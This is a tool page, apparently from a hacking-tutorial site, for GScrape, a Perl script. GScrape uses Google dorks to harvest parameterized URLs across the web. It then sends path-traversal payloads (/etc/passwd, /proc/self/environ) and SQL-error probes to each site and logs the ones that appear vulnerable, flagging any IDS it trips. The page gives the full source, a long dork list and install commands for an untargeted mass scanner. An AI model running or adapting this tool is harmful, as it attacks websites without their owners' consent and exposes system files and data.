GScrape
Introduction
GScrape is a small Perl script that uses Google's AJAX API (via Google::Search on CPAN) to find vulnerable websites.
The purpose of this script is to demonstrate that one can easily create simple tools to automate tedious tasks.
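The Google::Search interface the script is built on is small: construct a web search from a query string, then pull results one at a time. A minimal sketch of that loop, assuming Google::Search is installed (the query string is only an example):
<pre>
#!/usr/bin/perl
# Minimal sketch of querying Google's AJAX API through Google::Search (CPAN).
# The query string is just an example and is not part of GScrape itself.
use Google::Search;

my $search = Google::Search->Web( query => 'inurl:index.php?page=' );
while ( my $result = $search->next ) {
    print $result->uri, "\n";    # print each result's URL
}
</pre>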
Example
GScrape is a simple tool: it reads a user-specified file containing a list of search terms, queries Google with those terms to retrieve a list of websites, and then tests each site for a Local File Inclusion (LFI) vulnerability, along with a basic SQL error check.
Any vulnerable sites it finds are logged to the output file specified by the user.
<pre>
perl gscrape.pl -f dork.lst -o gscrape.log
</pre>
GScrape will not return any results unless your input file actually contains a list of search terms.
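The vulnerability check itself is plain string matching: a path-traversal payload is appended to the candidate URL's parameter and the response body is checked for tell-tale content such as the "root:x:" line from /etc/passwd. A rough sketch of that idea, with a hypothetical target URL and an abridged payload list (the full list is in the Source section below):
<pre>
# Rough LFI probe sketch -- the target URL is hypothetical and the payload
# list is abridged compared to the real script in the Source section.
use LWP::UserAgent;

my $ua  = LWP::UserAgent->new();
my $url = 'http://example.com/index.php?page=';      # hypothetical target
foreach my $payload ('/etc/passwd', '../../../../../../etc/passwd%00') {
    my $response = $ua->get($url . $payload);
    if ($response->content =~ /root:x:/) {            # classic /etc/passwd signature
        print "[LFI?] $url$payload\n";
        last;
    }
}
</pre>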
Search Terms
These are just some examples of general search terms; they are not guaranteed to find any vulnerabilities.
<pre>
.php?*=
inurl:index.php?page=
inurl:include.php?*=
index.php?include=
inurl:index.php?nic=
inurl:index.php?sec=
inurl:index.php?content=
inurl:index.php?link=
inurl:index.php?filename=
inurl:index.php?dir=
inurl:index.php?document=
inurl:index.php?view=
inurl:*.php?sel=
inurl:*.php?session=&content=
inurl:*.php?locate=
inurl:*.php?place=
inurl:*.php?layout=
inurl:*.php?go=
inurl:*.php?catch=
inurl:*.php?mode=
inurl:*.php?name=
inurl:*.php?loc=
inurl:*.php?f=
inurl:*.php?inf=
inurl:*.php?pg=
inurl:*.php?load=
inurl:*.php?naam=
cat.asp?cat=
Productlist.asp?Catalogid=
Category.asp?Category_Id=
Category.cfm?Category_Id=
category.asp?cid=
category.cfm?cid=
category.asp?cat=
category.cfm?cat=
category.asp?id=
index.cfm?Pageid=
category.asp?catid=
Category.asp?c=
Category.cfm?c=
Productlist.cfm?Catalogid=
Productlist.asp?Catalogid=
Viewitem.asp?Catalogid=
Viewitem.cfm?Catalogid=
catalog.cfm?Catalogid=
catalog.asp?Catalogid=
department.cfm?Dept=
department.asp?Dept=
Itemdetails.cfm?Catalogid=
Itemdetails.asp?Catalogid=
index.php?id=
trainers.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
page.php?file=
newsDetail.php?id=
gallery.php?id=
article.php?id=
show.php?id=
staff_id=
newsitem.php?num=
readnews.php?id=
top10.php?cat=
historialeer.php?num=
reagir.php?num=
</pre>
Please note that the search terms in your file DO NOT require "inurl:"; GScrape adds it for you if it isn't already there.
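In other words, each term read from the file is normalized before it is handed to Google. A small sketch of that step, using the dork.lst file name from the example above:
<pre>
# Sketch of the "inurl:" normalization GScrape applies to every term in the input file.
open my $fh, '<', 'dork.lst' or die $!;
while ( my $term = <$fh> ) {
    chomp $term;
    $term = "inurl:$term" unless $term =~ /inurl:/;   # prepend only when missing
    print "$term\n";
}
close $fh;
</pre>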
Source
<pre>
#!/usr/bin/perl
# gscrape.pl
#
# Uses Google::Search to iterate through a list of dorks (dorks.lst)
# and then prints out a list of vulnerable sites.

use Term::ANSIColor;
use Getopt::Std;
use HTTP::Request;
use Google::Search;
use LWP::UserAgent;

# vars n stuff
our %opt;                       # command-line options, filled in by getopts()
my $search;
my $useragent = LWP::UserAgent->new();
my $infile;
my $outfile;
my $searchmode;
my @url_list;
my @search_terms;               # search terms, and
my @dorks;                      # dorks, to check if the terms have "inurl:".
my @vulnsites;

##--main execution:
&banner();
&getOpts();

if ($opt{s} || $opt{f} && $opt{o} && !$opt{h}) {
    &printInfo("Trying with the following settings:");
    &printInfo(">>Search Mode: $searchmode");
    &printInfo(">>Output file: $outfile");
    # A single-term mode ($opt{s} / search_single) is referenced here but not
    # implemented in this revision; only list mode (-f) is actually usable.
    if ($searchmode eq "single") {
        &printInfo(">>Search Term: $search");
        &search_single();
    } else {
        &printInfo(">>Search List: $infile");
        &search_list();
    }
}
if (!$opt{h} && !$opt{o}) {
    &printCritical("YOU MUST SPECIFY AN OUTPUT FILE!1!one!");
    &printInfo("use -h flag for help");
    print "\n\r\nExiting..\n";
}

##--subroutines:
# Search using a list of terms:
sub search_list {
    open FILE, "<", $infile or die $!;
    my @search_terms = <FILE>;
    close FILE;
    my $num = @search_terms;
    &printInfo("Loaded $num search terms.");
    &printInfo("Fixing improper search terms [if any]");

    # iterate through the search terms; if a term lacks "inurl:", prepend it.
    foreach my $term (@search_terms) {
        chomp $term;
        if ($term !~ /inurl:/) {
            push(@dorks, "inurl:" . $term);
        } else {
            push(@dorks, $term);
        }
    }

    print "\n";
    &printInfo("Retrieving search results..");
    # iterate through the google dorks (search terms with 'inurl:') and collect result URLs.
    foreach (@dorks) {
        $search = Google::Search->Web( query => $_ );
        while ( my $result = $search->next ) {
            # keep only results with "=" in them (ex: www.site.com/index.php?page=LOLCATS)
            if ( $result->uri =~ /=/ ) {
                push(@url_list, $result->uri);
                &printInfo(">>" . $result->uri);
            }
        }
    }

    my @lfitest = (
        '/etc/passwd%00',
        '/etc/passwd',
        '/proc/self/environ%00',
        '/proc/self/environ',
        '../../../../../../../../../../../../../../../proc/self/environ',
        '../../../../../../../../../../../../../../../proc/self/environ%00',
        '../../../../../../../../../../../../../../../etc/passwd',
        '../../../../../../../../../../../../../../../etc/passwd%00',
        "'",
    );
    my $lfinum = @lfitest;

    print "\n";
    &printInfo("Testing sites for vulnerabilities..");
    # Test the sites for vulns.
    foreach my $url (@url_list) {
        my $x = $url;
        $x =~ s/=.*/=/;                                  # strip the parameter value, keep "param="
        $x = "http://" . $x if $x !~ /http:\/\//;
        for (my $i = 0; $i < $lfinum; $i++) {
            my $request = $useragent->get($x . $lfitest[$i]);
            my $result  = $request->content;
            if ($result =~ m/root:x:/i || $result =~ m/HTTP_USER_AGENT/) {
                &printVulnLFI(">>> " . $x . $lfitest[$i]);
                open FILE, ">>", $outfile or die $!;
                print FILE "[LFI VULN] >> " . $x . $lfitest[$i] . "\n";
                close FILE;
                last;
            }
            if ($result =~ m/error in your/i || $result =~ m/syntax/i) {
                &printVulnSQLI(">>> " . $x . $lfitest[$i]);
                open FILE, ">>", $outfile or die $!;
                print FILE "[SQLI VULN] >> " . $x . $lfitest[$i] . "\n";
                close FILE;
                last;
            }
            if ($result =~ m/hacking/i || $result =~ m/reported/i || $result =~ m/recorded/i || $result =~ m/malicious/i) {
                &printCritical("> Whoops! Tripped an IDS at: " . $x . " With: " . $lfitest[$i]);
            }
        }
    }
}

sub banner {
    system('clear');
    # ASCII-art banner
    print("\r+=====================================================================+
\r| GScrape |
\r| ________ _________ |
\r| / _____/ / _____/ ________________ ______ ____ |
\r| / \\ ___ \\_____ \\_/ ___\\_ __ \\__ \\ \\____ \\_/ __ \\ |
\r| \\ \\_\\ \\/ \\ \\___| | \\// __ \\| |_> > ___/ |
\r| \\______ /_______ /\\___ >__| (____ / __/ \\___ > |
\r| \\/ \\/ \\/ \\/|__| \\/ |
\r| |
\r| |
\r| Uses Google AJAX API to search for vulnerabilities |
\r+=====================================================================+
\r
\r www.BlackhatAcademy.org
");
    printWarning("THE END USER IS LIABLE FOR THE USE OF THIS SOFTWARE.
\rUSING THIS AGAINST ANY SYSTEM WITHOUT PERMISSION IS A CRIMINAL ACT
\rTHE AUTHOR TAKES NO RESPONSIBILITY FOR THE END-USER'S ACTIONS.\n");
}

sub getOpts {
    # option modes, and args.
    my $opt_string = 'f:o:h';
    getopts( "$opt_string", \%opt );
    # set $outfile and $infile if they are defined.
    if ($opt{o}) { $outfile = $opt{o}; }
    if ($opt{f}) { $infile = $opt{f}; $searchmode = "list"; }
    # Display help page if -h
    usage() if $opt{h};
}

# YES HELLO, THIS IS HELP PAGE.
sub usage {
    print("
GScrape Usage:
    Search using a list of search terms:  -f /path/to/dorks.txt
    Define output file:                   -o results.out

Example Usages:
    Run a list of search terms through the scanner:
        perl gscrape.pl -f ~/Dork.lst -o ~/result.out
");
}

# HERE BE ANSICOLOR:
# [INFO], [CRITICAL] and [WARNING] messages
sub printCritical {
    my $error = shift;
    print color('bold blue'), "\r[", color('red'), "CRITICAL", color('bold blue'), "] ",
          color('reset'), $error, "\n";
}

sub printWarning {
    my $error = shift;
    print color('bold blue'), "\r[", color('yellow'), "WARNING", color('bold blue'), "] ",
          color('reset'), $error, "\n";
}

sub printInfo {
    my $info = shift;
    print color('bold blue'), "\r[", color('reset'), "INFO", color('bold blue'), "] ",
          color('reset'), $info, "\n";
}

sub printVulnLFI {
    my $info = shift;
    print color('bold blue'), "\r[", color('green'), "LFI VULN ", color('bold blue'), "] ",
          color('reset'), $info, "\n";
}

sub printVulnSQLI {
    my $info = shift;
    print color('bold blue'), "\r[", color('green'), "SQLI VULN", color('bold blue'), "] ",
          color('reset'), $info, "\n";
}
</pre>
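The script pulls in Term::ANSIColor, Getopt::Std, HTTP::Request, Google::Search and LWP::UserAgent. The first two ship with Perl itself; Google::Search and the LWP modules typically have to be installed from CPAN first, for example:
<pre>
cpan Google::Search LWP::UserAgent
</pre>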
Visit the Web Exploitation Portal for complete coverage.